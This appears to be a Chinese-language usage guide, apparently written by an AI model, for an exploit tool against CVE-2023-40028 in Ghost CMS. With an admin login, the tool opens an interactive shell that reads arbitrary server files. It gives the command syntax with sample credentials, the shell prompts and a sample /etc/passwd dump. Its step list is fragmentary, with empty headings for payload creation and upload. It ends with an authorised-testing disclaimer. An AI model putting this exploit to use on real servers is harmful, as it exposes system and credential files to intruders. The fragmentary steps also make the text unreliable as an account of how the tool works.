./cve-2023-40028 -u <username> -p <password> -h <host_url>
-u <username>:目标 Ghost CMS 的管理员用户名。-p <password>:目标 Ghost CMS 的管理员密码。-h <host_url>:目标 Ghost CMS 的 URL(例如 http://127.0.0.1)。./cve-2023-40028 -u admin -p admin123 -h http://127.0.0.1
登录: 脚本将登录 Ghost CMS 管理 API 并生成一个会话 Cookie。
交互式文件读取: 成功登录后,你将进入一个交互式 Shell:
WELCOME TO THE CVE-2023-40028 SHELL
Enter the file path to read (or type 'exit' to quit):
输入文件路径:
提供你想要读取的文件的绝对路径(例如 /etc/passwd)。
接收文件内容: 文件内容将被获取并显示:
File content:
root:x:0:0:root:/root:/bin/bash
...
退出 Shell:
输入 exit 终止会话。
创建登录会话:
生成恶意载荷:
mktemp 生成一个临时工作目录。上传载荷:
读取文件:
清理:
本脚本仅可用于教育和授权的渗透测试。未经明确许可,使用本脚本攻击系统是非法且不道德的。
如有更多细节或调整需求,请随时告知!🚀